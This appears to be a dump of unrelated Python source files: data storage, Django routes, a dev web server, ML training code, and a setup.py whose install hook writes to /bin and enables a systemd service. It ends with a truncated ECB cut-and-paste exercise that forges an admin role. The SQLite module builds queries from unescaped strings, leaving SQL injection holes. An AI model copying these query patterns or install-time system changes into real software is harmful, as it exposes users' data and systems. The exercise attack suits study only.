NULL,'\n ' CONSTRAINT TS_VALUE_nameId_fk'\n ' FOREIGN KEY (nameId) REFERENCES TS_NAME (id),'\n ' CONSTRAINT TS_VALUE_uindex'\n ' UNIQUE (nameId, ts))'\n)\nmake_live_tbl = (\n 'CREATE TABLE LIVE_POINT ('\n ' id INTEGER PRIMARY KEY,'\n ' name VARCHAR(500) NOT NULL,'\n ' ts TIMESTAMP NOT NULL,'\n ' value decimal(25, 10) NOT NULL,'\n ' CONSTRAINT LIVE_POINT_uindex'\n ' UNIQUE (name, ts))'\n)\nmake_tmp_table = (\n 'CREATE TEMPORARY TABLE INSERT_TABLE ('\n ' name VARCHAR(500) NOT NULL,'\n ' ts TIMESTAMP NOT NULL,'\n ' value decimal(25, 10) NOT NULL)'\n)\ndrop_tmp_table = 'DROP TABLE INSERT_TABLE'\ninsert_names = 'INSERT OR IGNORE INTO TS_NAME (name) SELECT DISTINCT name from INSERT_TABLE'\ninsert_values = (\n 'INSERT OR REPLACE INTO TS_VALUE (nameId, ts, value)'\n ' SELECT b.id, a.ts, a.value'\n ' FROM INSERT_TABLE a'\n ' JOIN TS_NAME b'\n ' ON a.name = b.name'\n)\ndelete_values = (\n 'DELETE FROM TS_VALUE'\n ' WHERE TS_VALUE.nameId IN'\n ' (SELECT b.id FROM INSERT_TABLE a'\n ' INNER JOIN TS_NAME b'\n ' ON a.name = b.name)'\n)\ndelete_all_names = 'DELETE FROM TS_NAME'\ndelete_all_values = 'DELETE FROM TS_VALUE'\ndelete_live = 'DELETE FROM LIVE_POINT'\n\n\nclass TsDb:\n def __init__(self, db_loc):\n self.db_loc = db_loc\n if not os.path.isfile(db_loc):\n self.__configure_new_db()\n\n def __configure_new_db(self):\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n with closing(con.cursor()) as curs:\n curs.execute(make_name_tbl)\n curs.execute(make_value_tbl)\n curs.execute(make_live_tbl)\n\n con.commit()\n\n def delete_and_remake_entire_db(self):\n if os.path.exists(self.db_loc):\n os.remove(self.db_loc)\n\n self.__configure_new_db()\n\n def apply_alias_map(self, alias_dict):\n \"\"\"\n :param dict alias_dict: mapping from name to alias\n :rtype: None\n \"\"\"\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n with closing(con.cursor()) as curs:\n for name in alias_dict:\n alias_update = (\n \"UPDATE TS_NAME\"\n f\" SET alias = '{alias_dict[name]}'\"\n f\" WHERE name = '{name}'\"\n )\n curs.execute(alias_update)\n\n con.commit()\n\n def delete_old_values(self, sd_str):\n \"\"\"\n :param str sd_str: drop all values prior to start date string\n :rtype: None\n \"\"\"\n if not isinstance(sd_str, str):\n raise ValueError('sd_str must be a date string')\n\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n with closing(con.cursor()) as curs:\n curs.execute(f\"DELETE FROM TS_VALUE WHERE TS < '{sd_str}'\")\n\n con.commit()\n\n def insert_df(self, df, drop_existing_series=False):\n \"\"\"\n :param pd.DataFrame df: must have columns: name, ts, value\n :rtype: None\n \"\"\"\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n with closing(con.cursor()) as curs:\n curs.execute(make_tmp_table)\n\n # Load data to temp table\n df.to_sql('INSERT_TABLE', con, index=False, if_exists='append')\n\n # Load from temp table to real table\n curs.execute(insert_names)\n if drop_existing_series:\n curs.execute(delete_values)\n\n curs.execute(insert_values)\n\n # Cleanup\n curs.execute(drop_tmp_table)\n\n con.commit()\n\n def insert_live_df(self, df):\n \"\"\"\n :param pd.DataFrame df: must have columns: name, ts, value\n :rtype: None\n \"\"\"\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n with closing(con.cursor()) as curs:\n curs.execute(delete_live)\n df.to_sql('LIVE_POINT', con, index=False, if_exists='append')\n\n con.commit()\n\n def truncate_tables(self):\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n with closing(con.cursor()) as curs:\n curs.execute(delete_all_names)\n curs.execute(delete_all_values)\n curs.execute(delete_live)\n\n con.commit()\n\n # TODO: add method clean_unused_names() to drop names that are not referenced in the value table.\n def get_names(self):\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n query = 'select id, name, alias from TS_NAME'\n df = pd.read_sql(query, con=con)\n\n return df\n\n def get_alias_map(self):\n names = self.get_names()\n if names.empty:\n return {}\n\n return names.dropna().set_index('name')['alias'].to_dict()\n\n def get_values(self, ticker_list=None, sd_str='1900-01-01', ed_str='2999-01-01'):\n sep = '\",\"'\n ticker_filter = f'b.name in (\"{sep.join(ticker_list)}\") AND' if ticker_list else ''\n query = (\n 'select a.ts, b.name, a.value from TS_VALUE a JOIN TS_NAME b on a.nameId = b.id'\n f' WHERE {ticker_filter} a.ts >= \"{sd_str}\" AND a.ts <= \"{ed_str}\"'\n )\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n df = pd.read_sql(query, con=con)\n\n return df\n\n def get_start_and_end_times(self, ticker_list):\n sep = '\",\"'\n ticker_filter = f'b.name in (\"{sep.join(ticker_list)}\")'\n query = (\n 'select b.name, ga.ts_start, ga.ts_end'\n ' from (select nameId, MIN(ts) as ts_start, MAX(ts) as ts_end'\n ' from TS_VALUE group by nameId) as ga'\n ' LEFT JOIN TS_NAME b on ga.nameId = b.id'\n f' WHERE {ticker_filter}'\n )\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n df = pd.read_sql(query, con=con)\n\n # Need to marshall derived date fields. Returned as string.\n if not df.empty:\n df['ts_start'] = pd.to_datetime(df['ts_start'], format='%Y-%m-%d %H:%M:%S')\n df['ts_end'] = pd.to_datetime(df['ts_end'], format='%Y-%m-%d %H:%M:%S')\n\n return df\n\n def get_values_with_live_point(self, ticker_list=None, sd_str='1900-01-01', ed_str='2999-01-01'):\n df = self.get_values(ticker_list, sd_str, ed_str)\n sep = '\",\"'\n ticker_filter = f'WHERE name in (\"{sep.join(ticker_list)}\")' if ticker_list else ''\n query = f'select ts, name, value from LIVE_POINT {ticker_filter}'\n with closing(sqlite3.connect(self.db_loc, detect_types=sqlite3.PARSE_DECLTYPES)) as con:\n df_live = pd.read_sql(query, con=con)\n\n return df.append(df_live, ignore_index=True)","sub_path":"Caxton/JY_Completed/panormus/quant/data/bo/ts_local.py","file_name":"ts_local.py","file_ext":"py","file_size_in_byte":7625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"581828579","text":"from django.contrib import admin\nfrom django.urls import include, path\nfrom rest_framework_simplejwt import views as jwt_views\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/v1/', include('posts.urls')),\n path('api-auth/', include('rest_framework.urls')),\n path('api/token/', jwt_views.TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('api/token/refresh/', jwt_views.TokenRefreshView.as_view(), name='token_refresh'),\n]\n","sub_path":"class-34/demos/blog_deploy/blog_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"475363662","text":"import http.server\nimport argparse\nimport signal\nimport threading\nimport os\nimport sys\nimport time\nimport ssl\nimport subprocess\n\n\nclass BackgroundThread(threading.Thread):\n def __init__(self, service, cleanup):\n threading.Thread.__init__(self)\n self.running = False\n self.service = service\n self.cleanup = cleanup\n\n def run(self):\n while self.running:\n self.service()\n self.cleanup()\n\n def start(self):\n self.running = True\n return super().start()\n\n def stop(self):\n self.running = False\n\n\nclass IWPAServer:\n def __init__(self, PORT=8000, verbose=False, wasm_stream=True, secure=False):\n self.PORT = PORT if not secure else 4443\n self.verbose = verbose\n self.background_thread = None\n\n # setup handler\n class Handler(http.server.SimpleHTTPRequestHandler):\n def log_message(self, format, *args):\n if verbose:\n super().log_message(format, *args)\n\n Handler.extensions_map[\".js\"] = \"text/javascript\"\n if wasm_stream:\n Handler.extensions_map[\".wasm\"] = \"application/wasm\"\n else:\n Handler.extensions_map[\".wasm\"] = \"text/plain\"\n\n self.httpd = http.server.ThreadingHTTPServer((\"\", self.PORT), Handler)\n self.httpd.timeout = 2\n\n if secure:\n certs = self.generate_ssl()\n self.httpd.socket = ssl.wrap_socket(\n self.httpd.socket,\n keyfile=certs[\"key\"],\n certfile=certs[\"cert\"],\n server_side=True,\n ssl_version=ssl.PROTOCOL_TLS,\n )\n\n def generate_ssl(self):\n cmd = [\n \"openssl\",\n \"req\",\n \"-x509\",\n \"-newkey\",\n \"rsa:2048\",\n \"-keyout\",\n \"key.pem\",\n \"-out\",\n \"cert.pem\",\n \"-days\",\n \"365\",\n \"-nodes\",\n \"-subj\",\n \"/CN=localhost\",\n ]\n args = (\n {\"stdout\": subprocess.PIPE, \"stderr\": subprocess.PIPE}\n if not self.verbose\n else {}\n )\n sub = subprocess.Popen(cmd, **args)\n code = sub.wait()\n if code != 0:\n sys.stderr.write(f\"Failed to generate SSL certificates{os.linesep}\")\n sys.exit(1)\n return {\"key\": \"key.pem\", \"cert\": \"cert.pem\"}\n\n def start(self):\n if self.verbose:\n print(\"serving at port\", self.PORT)\n self.background_thread = BackgroundThread(\n service=self.httpd.handle_request, cleanup=self.httpd.server_close\n )\n self.background_thread.start()\n\n def stop(self):\n if self.verbose:\n print(\"shuting down port\", self.PORT)\n if self.background_thread:\n self.background_thread.stop()\n self.background_thread.join()\n\n def isRunning(self):\n return self.background_thread.running\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"HTTP Server\")\n parser.add_argument(\n \"-p\", \"--port\", type=int, default=8000, help=\"Port number to serve at\"\n )\n parser.add_argument(\n \"-v\", \"--verbose\", action=\"store_true\", help=\"Print debug information\"\n )\n parser.add_argument(\n \"-s\",\n \"--secure\",\n action=\"store_true\",\n default=False,\n help=\"Secure server using SSL\",\n )\n parser.add_argument(\n \"--wasm-stream\",\n action=\"store_true\",\n default=True,\n help=\"Enable streaming Web Assembly [DEFAULT]\",\n )\n parser.add_argument(\n \"--no-wasm-stream\",\n action=\"store_true\",\n default=False,\n help=\"Disable streaming Web Assembly\",\n )\n parser.add_argument(\n \"--directory\", type=str, default=\".\", help=\"Run the server at directory\"\n )\n\n args = parser.parse_args()\n\n # change to working directory\n current_dir = os.getcwd()\n if not os.path.isdir(args.directory):\n sys.stderr.write(f\"Invalid directory: '{args.directory}'\\n\")\n exit(1)\n os.chdir(args.directory)\n\n server = IWPAServer(\n PORT=args.port,\n verbose=args.verbose,\n wasm_stream=(args.wasm_stream and not args.no_wasm_stream),\n secure=args.secure,\n )\n\n try:\n server.start()\n while server.isRunning():\n time.sleep(2)\n except KeyboardInterrupt:\n server.stop()\n\n # change back\n os.chdir(current_dir)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"484415161","text":"from django.urls import path\nfrom .views import *\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('', index, name='index1.html'),\n # path('', error404, name='404.html'),\n path('index/', index, name='index.html'),\n path('login/', login, name='login'),\n path('cart/', cart, name='cart.html'),\n path('checkout/', checkout, name='checkout.html'),\n path('contact-us/', contactus, name='contact-us.html'),\n path('product-details/', productdetails, name='product-details.html'),\n path('shop/', cust, name='shop.html'),\n path('scoin/', scoin, name='scoin.html'),\n path('new/', cust, name='new.html'),\n path('bynow/', bynow, name='bynow'),\n path('purchase/', purchase, name='purchase'),\n path('validate/,', validate, name='validate'),\n path('product_add_cart/,,/',product_add_to_cart, name='add_to_cart'),\n path('offer_add_cart/,,/', offer_add_to_cart, name='add_to_cart1'),\n path('finish/,',finish_purchase,name='finish'),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","sub_path":"reward_management_system/mypro/myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"409032319","text":"from distutils.core import setup\nfrom watchtowr.db import register_server\nfrom os import environ, system\nfrom setuptools.command.install import install\n\n\nclass PostInstall(install):\n\n def run(self):\n # Register the server in our database\n user_id = environ.get('HTN_USER_ID', None)\n if user_id is None:\n raise Exception('HTN_USER_ID must be set')\n server_name = environ.get('HTN_SERVER_NAME', None)\n if server_name is None:\n raise Exception('HTN_SERVER_NAME must be set')\n print('Server ID', register_server(user_id, server_name))\n # Move the sh script to the /bin folder\n with open('./watchtowr/start.sh') as infile:\n with open('/bin/appList', 'w') as outfile:\n outfile.write(infile.read())\n system('chmod +x /bin/appList')\n # Register this script as a service\n data = \"\"\"[Unit]\nDescription=Threat monitoring service developed at Hack The North 2017 using Google's Firebase and eSentire's Cymon systems.\n\n[Service]\nExecStart=/bin/bash -c \"i=0; while true; do /usr/bin/python3 -c 'from watchtowr import daemon; daemon.startDaemon($i)'; sleep 5m; done;\"\n\n[Install]\nWantedBy=multi-user.target\n \"\"\"\n with open('/etc/systemd/system/watchtowr.service', 'w') as filehandle:\n filehandle.write(data)\n # Set up daemon to run\n system('systemctl daemon-reload; systemctl enable watchtowr; systemctl start watchtowr')\n # Super\n install.run(self)\n\n\nsetup(\n name='watchtowr',\n version='0.2',\n packages=['watchtowr'],\n license='',\n url='wat.ch/towr',\n author='A team',\n author_email='a_team@hackthenorth.com',\n cmdclass={\n 'install': PostInstall\n },\n long_description='Half of our project for Hack The North 2017'\n)\n","sub_path":"WatchtowrDaemon/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"325077452","text":"#\n# Pyserini: Python interface to the Anserini IR toolkit built on Lucene\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom copy import deepcopy\nfrom enum import Enum\nimport numpy as np\nimport pandas as pd\nfrom typing import Dict, List, Set, Tuple\n\n\nclass AggregationMethod(Enum):\n SUM = 'sum'\n\n\nclass RescoreMethod(Enum):\n RRF = 'rrf'\n SCALE = 'scale'\n\n\nclass TrecRun:\n \"\"\"Wrapper class for a trec run.\n\n Parameters\n ----------\n filepath : str\n File path of a given Trec Run.\n \"\"\"\n\n columns = ['topic', 'q0', 'docid', 'rank', 'score', 'tag']\n\n def __init__(self, filepath: str = None):\n self.run_data = pd.DataFrame(columns=TrecRun.columns)\n self.filepath = filepath\n\n if filepath is not None:\n self.read_run(self.filepath)\n\n def read_run(self, filepath: str) -> None:\n self.run_data = pd.read_csv(filepath, sep='\\s+', names=TrecRun.columns)\n\n def topics(self) -> Set[str]:\n \"\"\"\n Returns a set with all topics.\n \"\"\"\n return set(sorted(self.run_data[\"topic\"].unique()))\n\n def clone(self):\n \"\"\"\n Returns a deep copy of the current instance.\n \"\"\"\n return deepcopy(self)\n\n def save_to_txt(self, output_path: str, tag: str = None) -> None:\n if len(self.run_data) == 0:\n raise Exception('Nothing to save. TrecRun is empty')\n\n if tag is not None:\n self.run_data['tag'] = tag\n\n self.run_data = self.run_data.sort_values(by=['topic', 'score'], ascending=[True, False])\n self.run_data.to_csv(output_path, sep=' ', header=False, index=False)\n\n def get_docs_by_topic(self, topic: str, max_docs: int = None):\n docs = self.run_data[self.run_data['topic'] == topic]\n\n if max_docs is not None:\n docs = docs.head(max_docs)\n\n return docs\n\n def rescore(self, method: RescoreMethod, rrf_k: int = None, scale: float = None) -> None:\n rows = []\n\n if method == RescoreMethod.RRF:\n assert rrf_k is not None, 'Parameter \"rrf_k\" must be a valid integer.'\n\n for topic, _, docid, rank, _, tag in self.run_data.to_numpy():\n rows.append((topic, 'Q0', docid, rank, 1 / (rrf_k + rank), tag))\n\n elif method == RescoreMethod.SCALE:\n assert scale is not None, 'Parameter \"scale\" must not be none.'\n\n for topic, _, docid, rank, score, tag in self.run_data.to_numpy():\n rows.append((topic, 'Q0', docid, rank, score * scale, tag))\n else:\n raise NotImplementedError()\n\n return TrecRun.from_list(rows, self)\n\n def to_numpy(self) -> np.ndarray:\n return self.run_data.to_numpy(copy=True)\n\n @staticmethod\n def get_all_topics_from_runs(runs) -> Set[str]:\n all_topics = set()\n for run in runs:\n all_topics = all_topics.union(run.topics())\n\n return all_topics\n\n @staticmethod\n def merge(runs, aggregation: AggregationMethod, depth: int = None, k: int = None):\n \"\"\"Return a TrecRun by aggregating docid in various ways such as summing scores\n\n Parameters\n ----------\n runs : List[TrecRun]\n List of ``TrecRun`` objects.\n aggregation : AggregationMethod\n The aggregation method to use.\n depth : int\n Maximum number of results from each input run to consider. Set to ``None`` by default, which indicates that\n the complete list of results is considered.\n k : int\n Length of final results list. Set to ``None`` by default, which indicates that the union of all input documents\n are ranked.\n \"\"\"\n\n if len(runs) < 2:\n raise Exception('Merge requires at least 2 runs.')\n\n rows = []\n\n if aggregation == AggregationMethod.SUM:\n for topic in TrecRun.get_all_topics_from_runs(runs):\n doc_scores = dict()\n for run in runs:\n for topic, _, docid, _, score, _ in run.get_docs_by_topic(topic, depth).to_numpy():\n doc_scores[docid] = doc_scores.get(docid, 0.0) + score\n\n sorted_doc_scores = sorted(iter(doc_scores.items()), key=lambda x: (-x[1], x[0]))\n sorted_doc_scores = sorted_doc_scores if k is None else sorted_doc_scores[:k]\n\n for rank, (docid, score) in enumerate(sorted_doc_scores, start=1):\n rows.append((topic, 'Q0', docid, rank, score, 'merge_sum'))\n else:\n raise NotImplementedError()\n\n return TrecRun.from_list(rows)\n\n @staticmethod\n def from_list(rows, run=None):\n \"\"\"Return a TrecRun by populating dataframe with the provided list of tuples.\n For performance reasons, df.to_numpy() is faster than df.iterrows().\n When manipulating dataframes, we first dump to np.ndarray and construct a list of tuples with new values.\n Then use this function to convert the list of tuples to a TrecRun object.\n\n Parameters\n ----------\n rows: List[tuples]\n List of tuples in the following format: (topic, 'Q0', docid, rank, score, tag)\n\n run: TrecRun\n Set to ``None`` by default. If None, then a new instance of TrecRun will be created.\n Else, the given TrecRun will be modified.\n \"\"\"\n\n res = TrecRun() if run is None else run\n\n df = pd.DataFrame(rows)\n df.columns = TrecRun.columns\n res.run_data = df.copy()\n\n return res\n\n @staticmethod\n def from_search_results(docid_score_pair: Tuple[str, float], topic=1):\n rows = []\n\n for rank, (docid, score) in enumerate(docid_score_pair, start=1):\n rows.append((topic, 'Q0', docid, rank, score, 'searcher'))\n\n return TrecRun.from_list(rows)\n\n @staticmethod\n def concat(runs):\n \"\"\"Return a new TrecRun by concatenating a list of TrecRuns\n\n Parameters\n ----------\n runs : List[TrecRun]\n List of ``TrecRun`` objects.\n \"\"\"\n\n run = TrecRun()\n run.run_data = run.run_data.append([run.run_data for run in runs])\n return run\n","sub_path":"pyserini/trectools/_base.py","file_name":"_base.py","file_ext":"py","file_size_in_byte":6683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"513571553","text":"import tensorflow as tf\r\nimport numpy as np\r\nimport time\r\nimport os\r\nimport RHNet as model\r\nimport cv2\r\nimport math\r\n\r\nimport utils\r\n#Define some needed parameters\r\n\r\nmomentum=0.9\r\nEPOCH=2000\r\nlr=0.00001\r\n\r\n\r\nmethod = 'mcnn'\r\ndataset_name = 'WE'\r\noutput_dir = './saved_models/'\r\ntrain_path = '/home/xu519/yurui/ProcessedData/QNRF/train/img'\r\ntrain_label_path = '/home/xu519/yurui/ProcessedData/QNRF/train/den'\r\nval_path = '/home/xu519/yurui/ProcessedData/QNRF/test/img'\r\nval_label_path = '/home/xu519/yurui/ProcessedData/QNRF/test/den'\r\n\r\ninput_img=tf.placeholder(tf.float32,shape=[1,None,None,1])\r\ninput_den=tf.placeholder(tf.float32,shape=[1,None,None,1])\r\n\r\npre_den=model.create(input_img)\r\nloss=tf.losses.mean_squared_error(pre_den,input_den)\r\noptimizer=tf.train.AdamOptimizer(lr)\r\ntrain_op=optimizer.minimize(loss)\r\ndefault_graph=tf.get_default_graph()\r\n\r\ninit=tf.group(tf.global_variables_initializer(),tf.local_variables_initializer())\r\nsummary=tf.summary.merge_all()\r\n\r\ndata_loader = utils.ImageDataLoader(train_path, train_label_path, shuffle=True, gt_downsample=True, pre_load=True)\r\ndata_loader_val = utils.ImageDataLoader(val_path, val_label_path, shuffle=False, gt_downsample=True, pre_load=True)\r\n\r\nconfig=tf.ConfigProto(allow_soft_placement=True)\r\ngpu_options=tf.GPUOptions(per_process_gpu_memory_fraction=0.7)\r\nconfig.gpu_options.allow_growth = True\r\n\r\nwith tf.Session(graph=default_graph,config=config) as sess:\r\n\r\n sess.run(init)\r\n saver=tf.train.Saver(max_to_keep=0)\r\n best_mae=100000\r\n bast_mse=100000\r\n writer=tf.summary.FileWriter('./exp')\r\n writer.add_graph(sess.graph)\r\n for epo in range(1,EPOCH+1):\r\n start=time.time()\r\n num=0\r\n total_loss=0\r\n for blob in data_loader:\r\n num+=1\r\n train_image_1=blob['data']\r\n\r\n train_density_1=blob['gt_density']\r\n\r\n _,pre_density,train_loss=sess.run([train_op,pre_den,loss],feed_dict={\r\n input_img:train_image_1,\r\n input_den:train_density_1,\r\n })\r\n\r\n total_loss+=train_loss\r\n if num%500==0:\r\n count_tru=np.sum(train_density_1)\r\n count_pre=np.sum(pre_density)\r\n print('truth:'+str(count_tru)+' pre:'+str(count_pre))\r\n\r\n saver.save(sess, './result/'+str(epo)+'.ckpt')\r\n\r\n time_one_epoch=time.time()-start\r\n average_loss=total_loss/num\r\n\r\n print(str(epo)+'epoch Training loss is: %.4f ; time: %.4f' %(average_loss,time_one_epoch))\r\n\r\n\r\n\r\n valid_start_time = time.time()\r\n mae,mse=0,0\r\n total_val_loss=0\r\n num_val=0\r\n # Loop through all the images.\r\n for blob in data_loader_val:\r\n num_val+=1\r\n # Read the image and the ground truth\r\n val_image_r=blob['data']\r\n val_density_r=blob['gt_density']\r\n tru_count=np.sum(val_density_r)\r\n # Prepare the feed_dict\r\n feed_dict_data = {\r\n input_img: val_image_r,\r\n input_den: val_density_r,\r\n }\r\n\r\n # Compute the loss per image\r\n val_loss,val_den = sess.run([loss,pre_den], feed_dict=feed_dict_data)\r\n pre_count=np.sum(val_den)\r\n mae+=abs(pre_count-tru_count)\r\n mse+=(pre_count-tru_count)*(pre_count-tru_count)\r\n # Accumalate the validation loss across all the images.\r\n total_val_loss = total_val_loss +val_loss\r\n mae=mae/num_val\r\n mse=np.sqrt(mse)/num_val\r\n if mae j:\n return -1 \n \n mid = (i+j)//2\n if nums[mid] == target:\n return mid \n elif nums[mid] < target:\n return self.binarySearch(mid+1,j,nums,target)\n else:\n return self.binarySearch(i,mid-1,nums,target)\n \nif __name__ == \"__main__\":\n bs = Solution()\n nums = [3, 5, 7, 9, 10, 90, 100, 130, 140, 160, 170] \n print(bs.search(nums,10))\n","sub_path":"InfiniteSearch.py","file_name":"InfiniteSearch.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"515916091","text":"import csv\nimport math\n\nfrom PIL import Image\nimport numpy as np\nfrom keras.models import load_model\nimport tensorflow as tf\nfrom keras import Model\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau, Callback\nfrom keras.layers import Conv2D, Reshape, Dense, GlobalAveragePooling2D, MaxPooling2D, Activation, Input\nfrom keras.applications.mobilenet import preprocess_input\nfrom keras.utils import Sequence\nfrom keras.optimizers import Adam\nfrom keras.backend import epsilon\n\n# 0.35, 0.5, 0.75, 1.0\nALPHA = 0.35\n\n# 96, 128, 160, 192, 224\nIMAGE_SIZE = 224\n\nEPOCHS = 100\nBATCH_SIZE = 5\nPATIENCE = 20\nimage_width = 640.0\nimage_height = 480.0\n\nTRAIN_CSV = \"training.csv\"\nVALIDATION_CSV = \"validation.csv\"\n\nclass DataGenerator(Sequence):\n\n def __init__(self, csv_file):\n self.paths = []\n\n with open(csv_file, \"r\") as file:\n self.coords = np.zeros((sum(1 for line in file), 4))\n file.seek(0)\n\n reader = csv.reader(file, delimiter=\",\")\n for index, row in enumerate(reader):\n path, x1, x2, y1, y2 = row\n x1=np.float32(x1)\n x2=np.float32(x2)\n y1=np.float32(y1)\n y2=np.float32(y2)\n self.coords[index, 0] = (x1 * IMAGE_SIZE) / image_width\n self.coords[index, 1] = (x2 * IMAGE_SIZE) / image_width\n self.coords[index, 2] = (y1 * IMAGE_SIZE) / image_height\n self.coords[index, 3] = (y2 * IMAGE_SIZE) / image_height\n path1='/home/sounak/FlipkartGRiDLevel3/train/'+path \n self.paths.append(path1)\n\n def __len__(self):\n return math.ceil(len(self.coords) / BATCH_SIZE)\n\n def __getitem__(self, idx):\n batch_paths = self.paths[idx * BATCH_SIZE:(idx + 1) * BATCH_SIZE]\n batch_coords = self.coords[idx * BATCH_SIZE:(idx + 1) * BATCH_SIZE]\n\n batch_images = np.zeros((len(batch_paths), IMAGE_SIZE, IMAGE_SIZE, 3), dtype=np.float32)\n for i, f in enumerate(batch_paths):\n img = Image.open(f)\n img = img.resize((IMAGE_SIZE, IMAGE_SIZE))\n img = img.convert('RGB')\n\n batch_images[i] = preprocess_input(np.array(img, dtype=np.float32))\n img.close()\n\n return batch_images, batch_coords\n\nclass Validation(Callback):\n def __init__(self, generator):\n self.generator = generator\n\n def on_epoch_end(self, epoch, logs):\n mse = 0\n\n intersections = 0\n unions = 0\n\n for i in range(len(self.generator)):\n batch_images, gt = self.generator[i]\n pred = self.model.predict_on_batch(batch_images)\n mse += np.linalg.norm(gt - pred, ord='fro') / pred.shape[0]\n\n pred = np.maximum(pred, 0)\n\n diff_width = np.minimum(gt[:,0] + gt[:,1], pred[:,0] + pred[:,1]) - np.maximum(gt[:,0], pred[:,0])\n diff_height = np.minimum(gt[:,2] + gt[:,3], pred[:,2] + pred[:,3]) - np.maximum(gt[:,2], pred[:,2])\n intersection = np.maximum(diff_width, 0) * np.maximum(diff_height, 0)\n\n area_gt = gt[:,1] * gt[:,3]\n area_pred = pred[:,1] * pred[:,3]\n union = np.maximum(area_gt + area_pred - intersection, 0)\n\n intersections += np.sum(intersection * (union > 0))\n unions += np.sum(union)\n\n iou = np.round(intersections / (unions + epsilon()), 4)\n logs[\"val_iou\"] = iou\n\n mse = np.round(mse, 4)\n logs[\"val_mse\"] = mse\n\n\n print(\" - val_iou: {} - val_mse: {}\".format(iou, mse))\n\n\ndef create_model():\n img_input = Input((224, 224, 3))\n x = Conv2D(16, kernel_size=(3, 3), strides=(1, 1), padding='same')(img_input)\n x = Activation('relu')(x)\n x = MaxPooling2D((4, 4), strides=(2, 2))(x)\n x = Conv2D(32, kernel_size=(3, 3), strides=(1, 1), padding='same')(x)\n x = Activation('relu')(x)\n x = MaxPooling2D((4, 4), strides=(2, 2))(x)\n x = Conv2D(32, kernel_size=(3, 3), strides=(2, 2))(x)\n x = Activation('relu')(x)\n x = MaxPooling2D((4, 4), strides=(2, 2))(x)\n x = Conv2D(32, kernel_size=(2, 2), strides=(2, 2))(x)\n x = Activation('relu')(x)\n x = MaxPooling2D((4, 4), strides=(2, 2))(x)\n x = Conv2D(4, kernel_size=(2, 2))(x)\n x = Reshape((4,), name=\"coords\")(x)\n return Model(inputs=img_input, outputs=x)\n\n\ndef log_mse(y_true, y_pred):\n return tf.reduce_mean(tf.log1p(tf.squared_difference(y_pred, y_true)), axis=-1)\n\ndef main():\n model=load_model('/home/sounak/FlipkartGRIDNew/model-0.87_Final.h5', custom_objects={'log_mse':log_mse})\n\n train_datagen = DataGenerator(TRAIN_CSV)\n validation_datagen = Validation(generator=DataGenerator(VALIDATION_CSV))\n\n optimizer = Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)\n model.compile(loss=log_mse, optimizer=optimizer, metrics=[])\n checkpoint = ModelCheckpoint(\"model-{val_iou:.2f}_3.h5\", monitor=\"val_iou\", verbose=1, save_best_only=True, mode=\"max\")\n stop = EarlyStopping(monitor=\"val_iou\", patience=PATIENCE, mode=\"max\")\n reduce_lr = ReduceLROnPlateau(monitor=\"val_iou\", factor=0.2, patience=10, min_lr=1e-7, verbose=1, mode=\"max\")\n\n model.summary()\n\n model.fit_generator(generator=train_datagen, epochs=EPOCHS, callbacks=[validation_datagen, checkpoint, reduce_lr, stop])\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"grid_level3.py","file_name":"grid_level3.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"217524995","text":"#!/usr/bin/env python3\nimport user\nimport pad\n\n\ndef _main():\n # Oracle looks like:\n # email=foo@bar.com&uid=10&role=user\n\n # Plan: get the role=user part to be at the start of a block,\n # and cut it out. Then paste in the encryption for\n # role=admin. It is that easy.\n uid_len = len('&uid=10&')\n role_prefix_len = len('role=')\n email_prefix_len = len('email=')\n\n # We need to block align the 'user' so we can cut it out.\n total_len = email_prefix_len + role_prefix_len 